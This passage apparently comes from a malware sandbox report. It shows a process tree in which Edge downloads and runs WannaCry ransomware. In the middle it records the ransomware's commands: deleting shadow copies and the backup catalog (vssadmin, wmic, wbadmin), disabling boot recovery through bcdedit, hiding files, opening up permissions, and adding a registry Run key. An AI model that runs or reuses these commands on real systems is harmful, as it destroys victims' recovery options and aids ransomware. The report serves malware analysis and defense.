  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1868 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
  2⤵
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
  2⤵
  PID:3292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2452 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6132 /prefetch:8
  2⤵
  PID:4328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6556 /prefetch:8
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:1188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:1584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2612 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6668 /prefetch:8
  2⤵
  PID:2388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
  2⤵
  PID:904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
  2⤵
  PID:3220
- C:\Users\Admin\Downloads\WannaCry (3).EXE
  "C:\Users\Admin\Downloads\WannaCry (3).EXE"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:692
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2516
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5052
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 4591735304168.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3200
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:4676
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3404
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3644
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1148
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1888
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2860
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1740
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:816
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3360
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2648
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:684
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:876
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4176
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3104
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1388
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5068
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3952
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5092
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4664
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2388
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4528
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2480
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5068
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2276
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3816
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4680
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3136
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1180
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5052
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2440
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1820
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:356
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3612
- C:\Users\Admin\Downloads\WannaCry (3).EXE
  "C:\Users\Admin\Downloads\WannaCry (3).EXE"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3928
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3032
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:1372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
  2⤵
  PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1164 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:4432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7236 /prefetch:8
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
